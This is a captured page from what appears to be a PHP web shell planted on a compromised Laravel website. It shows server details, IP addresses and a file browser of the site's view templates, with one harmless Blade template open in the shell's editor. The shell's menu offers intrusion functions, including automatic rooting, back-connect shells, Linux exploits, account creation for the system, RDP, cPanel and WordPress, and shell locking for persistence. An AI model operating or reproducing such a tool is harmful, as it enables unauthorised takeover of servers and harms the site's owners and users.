Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya.biz /
amatya /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
Backend
[ DIR ]
drwxrwxr-x
auth
[ DIR ]
drwxrwxr-x
frontend
[ DIR ]
drwxrwxr-x
layouts
[ DIR ]
drwxrwxr-x
categoryTreeview.blade.php
5.75
KB
-rwxrwxr-x
home.blade.php
351
B
-rwxrwxr-x
mail.blade.php
145
B
-rwxrwxr-x
manageChild.blade.php
598
B
-rwxrwxr-x
manageChildhome.blade.php
757
B
-rwxrwxr-x
managechildmenu.blade.php
822
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : manageChild.blade.php
<ul> @foreach($childs as $child) <li> @if(strtoupper($child->title) == "CONTACT" || strtoupper($child->title) == "CONTACT US") <a href="/admin/contact/{{$child->parent_id}}">{{ $child->title }}</a> @elseif(strtoupper($child->title) == "PRODUCT") <a href="/product/get/{{$child->parent_id}}">{{ $child->title }}</a> @else <a href="/{{strtolower($child->title)}}/index/{{$child->id}}">{{ $child->title }}</a> @endif {{-- @if(count($child->childs)) @include('manageChild',['childs' => $child->childs]) @endif --}} </li> @endforeach </ul>
Close